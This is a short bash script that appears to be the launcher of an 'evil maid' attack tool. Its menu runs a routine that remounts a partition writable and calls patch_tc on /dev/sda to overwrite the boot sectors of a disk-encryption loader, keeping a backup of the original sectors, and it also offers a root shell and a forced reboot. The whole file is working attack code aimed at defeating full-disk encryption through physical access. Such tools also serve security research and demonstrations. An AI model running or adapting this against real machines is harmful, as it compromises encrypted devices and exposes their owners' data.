#!/bin/bash
PATH=$PATH:/sbin:$BASE
TARGET=/dev/sda

function run_evilmaid() {
	echo remounting $BASE rw...
	mount $BASE -o remount,rw || exit 1

	cd $BASE
	patch_tc $TARGET || {
		echo Something went wrong..;
		bash
	}

	DATE=`date +%F-%H%M%S`
	BACKUP_FILE=$BASE/sectors-$DATE
	echo saving original sectors in $BACKUP_FILE
	mv sectors_backup $BACKUP_FILE

	echo remounting $BASE in ro...
	mount $BASE -o remount,ro
	echo "done; you can reboot safely."
}

function run_shell() {
	bash
}

echo "TARGET = $TARGET"

while true ; do
	echo
	echo 'What do you want to do today: Run [E]vil Mail, [S]hell, [R]eboot'
	read cmd
	case X$cmd in
		X[Ee]) run_evilmaid ;;
		X[Ss]) run_shell ;;
		X[Rr]) reboot -f ;;
		*) echo Unrecognized command $cmd ;;
	esac
done
